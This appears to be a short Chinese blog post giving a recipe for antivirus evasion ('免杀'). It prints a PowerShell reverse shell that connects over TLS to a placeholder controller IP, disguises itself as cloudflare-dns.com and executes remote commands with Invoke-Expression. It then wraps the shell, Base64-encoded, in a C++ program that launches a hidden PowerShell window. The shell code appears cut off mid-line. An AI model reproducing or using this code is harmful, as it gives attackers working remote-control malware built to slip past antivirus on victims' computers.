C++国产免杀

C++国产免杀(顺手)

作者:liusuxy 难易程度: 一颗星

注意:由于方法简单,可能有人做过

效果如下:

免杀方法:

  • 1. 生成powershell的反弹shell代码

  • 2. 嵌入进C++中并生成exe

一,反弹shell代码(powershell)

这里没有分段,大家可以仔细的看

"$TCPClient = New-Object Net.Sockets.TCPClient('控制端IP', 控制端端口);$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream); function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream
接着Base64编码处理后复制

当然你也可以用网站在线生成:

在线反弹shell生成

二,嵌入进C++中并生成exe

这里作者写了个模板:

#include <windows.h>>
int main()
{
	system("powershell -nop -w hidden -e 刚刚复制的Base64代码"); 
	return 0; 
}

编译后就大功告成了

相关资源:

posted @ 2022-01-18 21:44  liusuxy  阅读(104)  评论(0)    收藏  举报